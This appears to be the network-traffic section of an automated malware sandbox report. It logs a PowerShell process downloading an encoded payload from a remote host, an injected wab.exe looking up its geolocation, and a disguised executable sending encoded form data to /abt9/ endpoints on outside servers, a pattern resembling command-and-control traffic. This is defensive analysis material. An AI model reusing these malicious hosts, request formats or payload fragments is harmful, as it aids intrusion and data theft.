                              Data Raw: d4 42 f3 67 67 9c 74 9f e3 fe 03 c0 17 a5 77 b6 fc f6 bf 05 24 a4 44 da 89 23 dc 7b 5c b7 36 c9 33 dc 5c df 71 73 cc 3d dd 28 1d 75 8c bd 65 a5 94 86 1e a4 55 53 d0 25 a9 65 8e 61 4f f1 38 b2 3c aa b5 5a 58 60 0b 50 01 e6 c2 52 87 94 da 18 d4 7e a7 6a f7 d8 92 94 9f 51 49 f7 58 1b fb 80 84 ec 11 d1 2a e5 00 b6 5b d5 42 04 48 c4 67 de 0e bc ea 23 b9 4b f6 f1 a6 7b c9 be c7 5e c6 89 77 9a 5b cc 91 23 76 3f 40 b5 07 26 9c 62 af 4c a6 18 98 b4 51 cc 9f 9f b2 31 73 2b 71 90 e4 6a cf 11 f4 d6 21 9e 63 e3 3b 70 c0 6f 89 c5 fa 6b 6a c0 7e d5 60 3f ed 73 5f 9d d3 4c 33 31 b0 fb 46 42 e9 75 1d ef 1e 73 40 14 77 96 30 7d 11 a5 51 99 8a 2f c0 09 ab 4d 4d 02 3e 65 3b c8 18 55 9c c3 4a b5 81 7d 1a 23 cf ac 02 a4 aa 06 3c 1e 9e 92 de 91 bf f6 c5 8c 4c 03 cb 43 98 d7 e1 5d cb d9 ae eb d9 7e eb b2 22 20 01 79 12 ee 68 f2 75 7d 99 01 66 9f 37 fc 29 ae 95 9b 41 a1 c5 8a c7 08 45 dd 3a ad 66 68 75 94 f7 32 5e 00 c2 3a 68 71 45 d1 44 96 ab 57 c1 93 f0 a6 dc d2 69 c1 5e eb be 18 34 2c 87 ed a5 3f f2 4d c0 a2 49 11 e9 47 [TRUNCATED]
                              Data Ascii: Bggtw$D#{\63\qs=(ueUS%eaO8<ZX`PR~jQIX*[BHg#K{^w[#v?@&bLQ1s+qj!c;pokj~`?s_L31FBus@w0}Q/MM>e;UJ}#<LC]~" yhu}f7)AE:fhu2^:hqEDWi^4,?MIGi9rc/|#F|;wC@\e#WX xV-O)R,l3:KiXq^-R(E-rU]i3+p=c[K9Ouf^y8mTS2p')4P2aY,D~L%.=dgb~dl%FlHaTDM6txRY),S^M1->f^*Xq^cPZU*:D%(5;[}`JE&R6pj_|]eP+kaw+mbQBxS)hrU;>veLzq4&qaH1}&nQPdYw?x~n#)Eh#CF1LXi/35I)%y%]0mJcnh'wN]1Z@ _HgyU}+O:?<AZ{J$Vgh07{}`
                              May 31, 2024 08:09:35.811613083 CEST224INData Raw: 38 2a ad e5 47 fc b0 91 74 39 0d 24 01 ec 78 bf be a8 2e 88 f5 94 a1 0d 99 26 12 5f de 32 23 7a 3e 1b 27 f7 01 c2 c1 68 42 29 6d db 69 b2 95 fb 62 27 66 40 e5 33 fd 8d 0b 07 b6 68 01 f3 8c db 6b a7 2c 58 27 b8 d9 de 8c 92 71 68 b8 52 d3 c2 20 5b
                              Data Ascii: 8*Gt9$x.&_2#z>'hB)mib'f@3hk,X'qhR [37RuJL\Lhp^3=nE)Rk ?#^t0Rj<gX&[Nf}LH{B7\>q
                              May 31, 2024 08:09:35.811656952 CEST1236INData Raw: e1 75 08 bf ef 8d 99 95 b1 c5 f1 a2 93 89 2c e6 d2 8c d9 33 01 ec 6f d4 27 f0 38 99 67 ea a5 bd ce b3 2d 7a f8 71 91 81 c6 e5 9b 3a 8a 94 84 65 61 0a 1b 06 01 56 3c b6 57 34 68 e2 99 b2 4d 7f bc 96 81 98 8a e8 72 4f a8 c8 13 50 2d b6 02 ab 1d c4
                              Data Ascii: u,3o'8g-zq:eaV<W4hMrOP-14CH=+f@n[QI53Nbc B-Q u^*j#t@\UB!Y)=u0=.>(})!!H:cn{9:X4p*s
                              May 31, 2024 08:09:35.811671972 CEST1236INData Raw: 51 e0 88 c7 ca ce 56 80 8f 78 e4 01 84 2d 72 d7 6b 49 40 8f f5 1d ce f6 b5 5f 34 61 7e e7 54 07 51 e7 ff af b9 26 3f df 31 cf 26 d1 43 32 48 fa 76 db a9 0e 66 96 72 20 12 30 5d 60 34 c2 b8 8c ad e3 91 e2 dd 2f 32 4d 74 de 98 cb 15 84 40 ba 88 ff
                              Data Ascii: QVx-rkI@_4a~TQ&?1&C2Hvfr 0]`4/2Mt@*I7miST1OZsF:/G%]pQrE<j(4U~\f^~Tb'kXMZGc0'#SE`w`YQWF@ e1HMLF.PmLKYL$@
                              May 31, 2024 08:09:35.811685085 CEST1236INData Raw: 2a a5 cf 12 44 ad d3 33 8a f2 d2 dc 98 6b 5e 54 24 5e 52 5e 28 fb 52 0e ca 20 38 ca 3f 76 e2 d9 dc 66 04 ff 79 77 c2 49 0a 2e a8 1d 5a 42 70 87 ec c4 0e 3a d6 63 0b 66 67 12 6f bf d1 5c 43 ee 0d e7 6f 0e c3 03 09 86 f4 dc 8f 84 12 85 a0 0c 59 cf
                              Data Ascii: *D3k^T$^R^(R 8?vfywI.ZBp:cfgo\CoYP@Ia9c'><a6iBb1~sYs=*W6n5kkU_o(Zt,%*=nAHI#I
                              May 31, 2024 08:09:35.811697960 CEST672INData Raw: 65 ae 91 d8 99 3c 67 6c 86 b0 46 98 aa 3d ae 49 85 e2 79 12 13 c1 52 0f 6e 28 f3 fe e9 7f e2 5f f8 66 57 8a 7c 70 25 bf 68 80 b8 f1 f2 98 ee 4b 16 b0 6c c6 c3 f0 ab 42 8c 44 91 0d 0b dd de 86 cf cc 4f b8 83 f3 c6 ad 41 e3 e1 cc 33 39 40 6c 73 1c
                              Data Ascii: e<glF=IyRn(_fW|p%hKlBDOA39@lszF/k:$34N:8PUUzcmkvU@Vk|2EyyEG6@]s,Cr<NsXRo[Zk ]t]3OzQG&vf{xq#}
                              May 31, 2024 08:09:35.898271084 CEST1236INData Raw: c3 f1 d0 e7 13 d1 ee 22 b1 6c 41 f0 15 89 9d c4 3f 0c 15 4a f9 1f 9a db f5 9b 7e 5a 8b 73 87 ec 9d af 38 1a 02 50 df 61 4d 90 30 79 48 15 f9 17 6b 49 0e c3 68 7f 7b 79 25 8d 69 f5 3c 6e 1a 3c f9 8b af ad b6 15 3a e0 11 99 c5 73 84 26 23 49 16 68
                              Data Ascii: "lA?J~Zs8PaM0yHkIh{y%i<n<:s&#Ih_0t=n\!oXv)n,` 1 (<w!pU+3XY/;_`Oo"$K$dfIb%;Rx<hjmk 3{[U> L1UpQb=W,/*Di
                              May 31, 2024 08:09:35.898292065 CEST224INData Raw: a4 de 5c 11 c1 ea 8e d8 c7 0c 6b 6a d1 ee 3c 15 47 bc 7a b2 99 04 e7 37 0b 14 af c5 5b 0a 0b 9e 7e 84 2e 94 7b 47 df 8c 9a 9a 52 d7 2a 03 a9 bf 61 9e 1d 6b 99 c6 45 66 6b 09 47 77 71 d5 8d 61 6f a4 2d 52 31 51 09 e2 ee 7b 25 64 ff e9 14 56 92 e8
                              Data Ascii: \kj<Gz7[~.{GR*akEfkGwqao-R1Q{%dVRg(OB1vR4pK6r|yA/7pF8az:27Pm[7~g 0T+niGA|l`[X%0Ify^f-@_
                              May 31, 2024 08:09:35.898405075 CEST1236INData Raw: 1e e9 eb 8f 07 18 41 f6 9c 49 fa 1b 3a ea 33 78 7b 18 f9 ac 11 db ee c5 4b ed e2 5b aa af 16 89 4e e3 24 1d db 9e d0 01 87 29 72 bd b3 d5 5c 23 2e 94 52 93 91 32 8c 36 30 02 5c 48 87 b1 2e 79 33 1f 90 cf 78 bc 5c 93 44 a3 9c c9 b7 e6 d9 b3 58 b7
                              Data Ascii: AI:3x{K[N$)r\#.R260\H.y3x\DX+,a$YDU|Y>Y:g'u?(v@NLmi"I(xdM**5+)WClAcwJj_mv2#ap-)vj~(_u)
                              May 31, 2024 08:09:35.898446083 CEST1236INData Raw: d8 1f 7c 02 fb 92 00 4b 7e 4f 02 2b 01 12 e9 a8 ea a5 4c fc 44 31 53 d4 b2 01 f9 64 f9 17 35 7c da df e0 bd ac 5c 7d 20 6d ec d6 52 84 d6 e7 0c 1b f6 5b 87 5f fd 62 09 73 c1 5f 37 6e 6d 5d 8f d2 36 43 48 e4 3b c3 68 9d 1b 39 94 07 f0 86 50 8e 03
                              Data Ascii: |K~O+LD1Sd5|\} mR[_bs_7nm]6CH;h9P9l)ZE!>rl_w:O3W pW>cnV|k kKA)M'`|L]RMQlfo[?{]J3R* _-iq=o=zL#yVOiUgBc
                              May 31, 2024 08:09:35.898461103 CEST1236INData Raw: 69 dd 80 25 60 99 a2 a8 81 47 08 81 32 68 c2 6c b7 be a7 fc 71 18 1a 5a 5b 60 80 91 c7 e2 c2 04 f3 9a 32 27 6c 7e a7 e1 31 86 50 90 df 07 b6 83 7c 17 70 71 6c 93 ee 2e d5 b5 ff c2 7f c5 14 ec 18 c9 67 de 8d 78 fa 7d 7b 43 f6 a0 59 4f ed ef 3f 07
                              Data Ascii: i%`G2hlqZ[`2'l~1P|pql.gx}{CYO?y%R{`Gn;3s,P=GHR0~Tg=v<&$XjBZY0p1#O|co-R1z3J?T=F'.S^#b-lGh-Z{Jdt}k$


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              2192.168.2.651550178.237.33.50807108C:\Program Files (x86)\Windows Mail\wab.exe
                              TimestampBytes transferredDirectionData
                              May 31, 2024 08:09:38.715168953 CEST71OUTGET /json.gp HTTP/1.1
                              Host: geoplugin.net
                              Cache-Control: no-cache
                              May 31, 2024 08:09:39.342955112 CEST1171INHTTP/1.1 200 OK
                              date: Fri, 31 May 2024 06:09:39 GMT
                              server: Apache
                              content-length: 963
                              content-type: application/json; charset=utf-8
                              cache-control: public, max-age=300
                              access-control-allow-origin: *
                              Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 37 35 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED]
                              Data Ascii: { "geoplugin_request":"8.46.123.175", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              3192.168.2.651558137.220.252.40806928C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exe
                              TimestampBytes transferredDirectionData
                              May 31, 2024 08:10:50.697144032 CEST471OUTGET /abt9/?URl0T=nO9f1eGtjr/sKzmKQQI1Gqn0vyk6T1iYdf0G+pz4r/6P+DB2OQ61Wxj49dZSRaju4ptYBpim6kquuDHdOrdtP4lJF/NTbeuWt8c3rTDi+tIT1z/PR+XwsW/JFZfA6LrcKjOeOKI=&_t6=urjP348hAPL0Tj-P HTTP/1.1
                              Host: www.387mfyr.sbs
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Language: en-us
                              Connection: close
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                              May 31, 2024 08:10:51.477447033 CEST691INHTTP/1.1 404 Not Found
                              Server: nginx
                              Date: Fri, 31 May 2024 06:10:51 GMT
                              Content-Type: text/html
                              Content-Length: 548
                              Connection: close
                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              4192.168.2.65155937.235.104.9806928C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exe
                              TimestampBytes transferredDirectionData
                              May 31, 2024 08:11:06.606436968 CEST733OUTPOST /abt9/ HTTP/1.1
                              Host: www.led-svitidla.eu
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-us
                              Origin: http://www.led-svitidla.eu
                              Referer: http://www.led-svitidla.eu/abt9/
                              Cache-Control: max-age=0
                              Connection: close
                              Content-Type: application/x-www-form-urlencoded
                              Content-Length: 210
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                              Data Raw: 55 52 6c 30 54 3d 76 58 56 36 65 6f 50 64 4a 34 37 52 68 72 59 53 48 71 56 6b 46 49 6a 66 6a 58 31 7a 64 41 46 31 70 63 52 76 45 5a 73 41 66 46 46 36 65 72 67 6b 49 59 71 6b 2b 2f 6a 62 38 63 63 37 69 2b 59 59 34 6a 31 42 78 4b 33 6c 6d 6d 34 4f 34 74 34 62 59 33 4a 54 4a 55 6a 4e 70 63 6a 61 2f 4e 45 69 79 4a 5a 6f 63 72 69 36 67 51 61 51 7a 6a 73 77 53 4f 39 64 42 73 74 46 6d 45 50 50 4e 75 4b 57 38 68 33 52 34 4c 4e 69 56 73 46 47 34 6b 78 62 71 58 4e 2b 34 59 45 46 70 6b 45 62 30 62 62 4f 2b 31 43 37 49 78 67 6a 71 4c 71 35 48 50 4f 69 37 31 77 6c 6c 70 79 4c 74 36 34 35 70 42 4e 48 34 32 30 6b 6c 34 30 52 4e 33 72 50
                              Data Ascii: URl0T=vXV6eoPdJ47RhrYSHqVkFIjfjX1zdAF1pcRvEZsAfFF6ergkIYqk+/jb8cc7i+YY4j1BxK3lmm4O4t4bY3JTJUjNpcja/NEiyJZocri6gQaQzjswSO9dBstFmEPPNuKW8h3R4LNiVsFG4kxbqXN+4YEFpkEb0bbO+1C7IxgjqLq5HPOi71wllpyLt645pBNH420kl40RN3rP
                              May 31, 2024 08:11:07.296140909 CEST544INHTTP/1.1 404 Not Found
                              Date: Fri, 31 May 2024 06:11:07 GMT
                              Server: Apache
                              X-Content-Type-Options: nosniff
                              X-XSS-Protection: 1;mode=block
                              Content-Length: 315
                              Connection: close
                              Content-Type: text/html; charset=iso-8859-1
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                              Session IDSource IPSource PortDestination IPDestination Port
                              5192.168.2.65156137.235.104.980
                              TimestampBytes transferredDirectionData
                              May 31, 2024 08:11:11.760797977 CEST757OUTPOST /abt9/ HTTP/1.1
                              Host: www.led-svitidla.eu
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-us
                              Origin: http://www.led-svitidla.eu
                              Referer: http://www.led-svitidla.eu/abt9/
                              Cache-Control: max-age=0
                              Connection: close
                              Content-Type: application/x-www-form-urlencoded
                              Content-Length: 234
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                              Data Raw: 55 52 6c 30 54 3d 76 58 56 36 65 6f 50 64 4a 34 37 52 37 4c 6f 53 47 4c 56 6b 48 6f 6a 63 39 6e 31 7a 4b 51 45 64 70 63 64 76 45 63 63 51 66 51 74 36 65 4f 45 6b 50 64 47 6b 72 2f 6a 62 33 38 63 2b 74 65 59 58 34 6a 78 7a 78 4c 4c 6c 6d 6d 73 4f 34 74 6f 62 59 46 68 51 50 55 6a 4c 79 73 6a 55 79 74 45 69 79 4a 5a 6f 63 72 6d 51 67 51 43 51 76 48 6f 77 64 50 39 65 66 63 74 43 77 30 50 50 4a 75 4b 53 38 68 33 6a 34 4b 52 62 56 71 5a 47 34 67 35 62 72 43 68 39 68 6f 45 44 6e 45 46 76 6b 62 44 48 35 79 6a 66 4c 43 51 50 35 4d 75 4a 43 35 50 34 6e 47 77 47 33 35 53 4a 74 34 67 4c 70 68 4e 74 36 32 4d 6b 33 76 34 32 43 44 4f 73 39 4d 4f 65 47 76 6c 59 77 2b 66 6d 7a 6a 35 56 4a 35 53 6d 6e 41 3d 3d
                              Data Ascii: URl0T=vXV6eoPdJ47R7LoSGLVkHojc9n1zKQEdpcdvEccQfQt6eOEkPdGkr/jb38c+teYX4jxzxLLlmmsO4tobYFhQPUjLysjUytEiyJZocrmQgQCQvHowdP9efctCw0PPJuKS8h3j4KRbVqZG4g5brCh9hoEDnEFvkbDH5yjfLCQP5MuJC5P4nGwG35SJt4gLphNt62Mk3v42CDOs9MOeGvlYw+fmzj5VJ5SmnA==
                              May 31, 2024 08:11:12.544970989 CEST544INHTTP/1.1 404 Not Found
                              Date: Fri, 31 May 2024 06:11:12 GMT
                              Server: Apache
                              X-Content-Type-Options: nosniff
                              X-XSS-Protection: 1;mode=block
                              Content-Length: 315
                              Connection: close
                              Content-Type: text/html; charset=iso-8859-1
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.651553188.215.50.15443504C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              TimestampBytes transferredDirectionData
                              2024-05-31 06:09:44 UTC170OUTGET /Rutschebanes.qxd HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                              Host: ramirex.ro
                              Connection: Keep-Alive
                              2024-05-31 06:09:44 UTC365INHTTP/1.1 200 OK
                              Date: Fri, 31 May 2024 06:09:44 GMT
                              Server: Apache/2.2.34 (Unix) mod_ssl/2.2.34 OpenSSL/1.0.1e-fips mod_bwlimited/1.4 mod_qos/11.5 mod_fcgid/2.3.9
                              Last-Modified: Sun, 26 May 2024 15:12:56 GMT
                              ETag: "26600d4-66eac-6195cd5e836f3"
                              Accept-Ranges: bytes
                              Content-Length: 421548
                              Connection: close
                              Content-Type: application/vnd.quark.quarkxpress
                              2024-05-31 06:09:44 UTC16384INData Raw: 36 77 4c 50 69 2b 73 43 4a 38 57 37 71 48 38 4d 41 4f 73 43 6a 48 74 78 41 5a 73 44 58 43 51 45 63 51 47 62 63 51 47 62 75 66 30 47 7a 48 72 72 41 73 71 52 63 51 47 62 67 66 45 78 42 68 30 47 36 77 49 64 68 75 73 43 6f 67 36 42 36 63 77 41 30 58 7a 72 41 73 5a 38 36 77 4a 59 2b 2b 73 43 57 66 72 72 41 69 67 5a 75 6a 78 2b 68 68 48 72 41 72 62 4c 36 77 4a 33 41 6e 45 42 6d 2b 73 43 74 68 30 78 79 6e 45 42 6d 2b 73 43 6b 58 75 4a 46 41 76 72 41 6e 36 43 63 51 47 62 30 65 4c 72 41 69 55 59 36 77 4b 49 52 34 50 42 42 48 45 42 6d 33 45 42 6d 34 48 35 47 49 4f 66 41 33 7a 4c 36 77 49 51 61 48 45 42 6d 34 74 45 4a 41 52 78 41 5a 74 78 41 5a 75 4a 77 2b 73 43 41 30 58 72 41 70 6e 5a 67 63 4e 53 79 66 34 41 63 51 47 62 63 51 47 62 75 6e 74 31 62 32 42 78 41 5a 76
                              Data Ascii: 6wLPi+sCJ8W7qH8MAOsCjHtxAZsDXCQEcQGbcQGbuf0GzHrrAsqRcQGbgfExBh0G6wIdhusCog6B6cwA0XzrAsZ86wJY++sCWfrrAigZujx+hhHrArbL6wJ3AnEBm+sCth0xynEBm+sCkXuJFAvrAn6CcQGb0eLrAiUY6wKIR4PBBHEBm3EBm4H5GIOfA3zL6wIQaHEBm4tEJARxAZtxAZuJw+sCA0XrApnZgcNSyf4AcQGbcQGbunt1b2BxAZv
                              2024-05-31 06:09:44 UTC16384INData Raw: 47 70 71 44 2b 5a 64 44 56 74 61 47 33 2f 34 58 72 39 70 53 35 4b 41 64 59 33 69 6a 73 53 4c 67 54 6e 6d 44 2b 66 4e 68 75 47 34 77 75 61 39 77 39 6e 76 6f 4b 64 30 68 78 6e 6b 66 69 41 6c 44 4f 50 6f 6c 34 33 30 65 34 63 30 39 63 36 47 4c 59 4a 75 59 71 4c 70 54 33 65 51 51 2f 39 6c 4a 42 4b 46 4a 56 4d 38 44 4c 76 4f 6c 62 58 7a 65 4c 6e 74 73 49 35 59 64 59 2b 53 67 75 32 48 4a 75 4c 5a 2f 49 65 73 69 4c 44 6c 59 54 42 57 64 4e 77 72 4c 48 6f 37 6e 2b 70 48 45 42 51 68 4f 71 6f 5a 77 78 55 7a 32 55 79 49 69 46 71 48 73 6f 45 72 63 4e 43 57 67 57 47 56 58 31 5a 50 47 30 5a 79 6b 44 43 74 39 31 72 49 38 6c 49 58 74 6e 6f 44 6e 50 39 41 58 66 37 65 30 44 7a 51 2f 47 43 36 41 67 43 5a 79 4e 56 4e 78 41 39 65 72 4c 75 54 70 56 44 6b 65 72 58 56 45 57 7a 6c
                              Data Ascii: GpqD+ZdDVtaG3/4Xr9pS5KAdY3ijsSLgTnmD+fNhuG4wua9w9nvoKd0hxnkfiAlDOPol430e4c09c6GLYJuYqLpT3eQQ/9lJBKFJVM8DLvOlbXzeLntsI5YdY+Sgu2HJuLZ/IesiLDlYTBWdNwrLHo7n+pHEBQhOqoZwxUz2UyIiFqHsoErcNCWgWGVX1ZPG0ZykDCt91rI8lIXtnoDnP9AXf7e0DzQ/GC6AgCZyNVNxA9erLuTpVDkerXVEWzl
                              2024-05-31 06:09:44 UTC16384INData Raw: 6b 73 50 6f 71 66 79 6e 73 6e 69 6a 69 54 4e 63 56 6c 79 50 46 4a 56 68 6d 73 73 69 4b 44 43 73 61 2b 74 57 2b 4d 46 62 64 38 6d 72 7a 43 35 30 4b 51 55 7a 79 43 49 68 70 42 63 5a 39 4e 4b 54 79 33 65 51 4f 41 37 52 79 61 37 35 32 79 59 46 56 52 78 69 6b 44 43 43 37 73 47 37 69 68 34 41 4f 55 77 4d 6b 63 37 43 47 4a 6d 32 48 56 57 47 50 69 6f 37 44 4f 58 64 59 4f 54 49 79 67 79 76 69 42 4b 6b 31 6a 38 64 59 2b 53 67 74 52 57 6d 32 33 4d 70 49 66 4a 4c 36 50 67 79 35 58 38 45 41 4a 59 4a 4c 51 2f 6f 4a 36 59 55 34 74 6e 46 49 53 6c 48 2f 42 6f 39 65 65 75 68 43 30 33 6b 6f 42 31 6a 59 52 37 57 34 34 57 7a 6e 46 66 41 48 4b 62 36 45 53 45 70 52 35 50 4f 37 36 53 30 47 4c 6b 5a 34 64 6b 6f 39 35 47 71 4b 57 59 30 55 65 33 52 73 6a 79 55 68 65 32 6d 67 4f 63
